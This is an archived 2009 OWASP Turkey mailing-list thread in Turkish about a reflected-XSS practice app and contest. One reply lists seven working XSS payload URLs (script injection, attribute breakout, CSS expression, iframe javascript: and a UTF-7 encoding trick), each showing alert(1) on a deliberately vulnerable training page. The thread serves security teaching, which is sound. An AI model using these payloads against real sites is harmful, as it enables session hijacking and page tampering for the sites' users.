[Owasp-turkey] Reflected XSS Oyun Grubu ve Yarisma

Huzeyfe ONAL huzeyfe at lifeoverip.net
Tue Jun 16 02:30:21 EDT 2009


Selamlar,


benim default ayarlarla denedigim birkac arac da bazilarini bulamadi. Bu
aslinda otomatize araclarin/yontemlerin ne kadar efektif olabilecegini
gostermesi acisindan onemli bir calisma.

Ama buradaki xss'lerin gunumuz uygulamalarinda bulunma orani da cok onemli.
Yani %1 bulunacak bir ihtimal icin bir dunya ek calisma yapmak istemiyordur
arac yazarlari.



---
Huzeyfe ONAL
Ag Guvenligi Listesine uye oldunuz mu?
http://blog.lifeoverip.net/netsec-listesi/

---


2009/6/16 Bedirhan Urgun <bedirhanurgun at gmail.com>

> tesekkurler Sertan. Tebrik ederim, referansli aciklamalarin ozellikle cok
> faydali. Cagdas ile adreslerinizi bana ozel gonderebilirseniz hediyeleri
> gonderecegim.
>
> Bu arada hepsini bulan (false-positive olmayacak sekilde) otomatik uygulama
> varsa bildiginiz merak ediyorum. Benim denediklerim de mutlaka 1-2 (hatta
> bazen 3) eksik cikiyor.
>
> 16 Haziran 2009 Salı 00:23 tarihinde Sertan Kolat <
> sertan at mlists.olympos.org> yazdı:
>
>  Merhaba,
>>
>>
>> Cok guzel uygulama, elinize saglik.
>>
>>
>> 1) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector1=
>> <script>alert(1)</script>a
>>
>> 2) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector2=
>> "><script>alert(1)</script>a
>>
>> 3) (IE6)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url%28javascript:alert%281%29%29>
>>
>> veya (IE8)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression%28alert%281%29%29>
>> ;
>>
>> 4) (FF3)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert%281%29;%3C/script%3E>
>>
>> 5) (FF3)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert%281%29%3E>
>>
>> 6) (IE7, encoding auto-select[1])
>> http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-<http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert%281%29%2bADw-%2fscript%2bAD4->
>>
>> 7) (IE6)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url%28javascript:alert%281%29%29>
>>
>>
>>
>> [1] IE charset encoding Auto-Selection:
>>
>> If 'Encoding' is set to 'Auto-Select', and Internet-Explorer finds a UTF-7
>> string in the first 4096 characters of the response's body, it will set the
>> charset encoding to UTF-7 automatically, unless a certain charset encoding
>> is already enforced.
>>
>>
>>
>> Sertan Kolat
>>
>>
>> On Monday, June 15, 2009, 1:06:17 PM, you wrote:
>>
>>  Merhaba,
>>
>> Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir "oyun
>> grubu" uygulamasına http://www.webguvenligi.org/xsstb/reflected.php
>>  erişebilirsiniz.
>>
>> Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek
>> xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all
>> olarak asagida verdigim link gibi gonderen ilk iki kisye;
>>
>>
>>
>> 1inciye Maldivler'e 2 kisilik 7 gun 7 gece seyehat
>>
>> 2inciye Son model araba
>>
>>
>>
>> Yok daha neler!...
>>
>>
>>
>> 1inciye OWASP Membership T-Shirt'u (L)
>>
>> 2inciye OWASP Membership DVD'si
>>
>>
>>
>> gonderecegim.
>>
>>
>>
>> Ornek; (birinci tuyo benden)
>>
>>
>> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert%281%29%3C/script%3E>
>>
>>
>>
>>
>>
>> Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli
>>
>> Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi
>>
>> Not 3: en son yazdigim hediyeler gecerli! sonra "vay ben gormedim" olmasin
>>
>>
>>
>> Proje Post'u:
>> http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
>>
>> --
>>
>> Bedirhan Urgun
>>
>> http://www.webguvenligi.org
>>
>> http://www.owasp.org/index.php/Turkey
>>
>>
>> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
>>
>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>
>
>
>
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
> _______________________________________________
> Owasp-turkey mailing list
> Owasp-turkey at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20090616/983fba39/attachment.html 


More information about the Owasp-turkey mailing list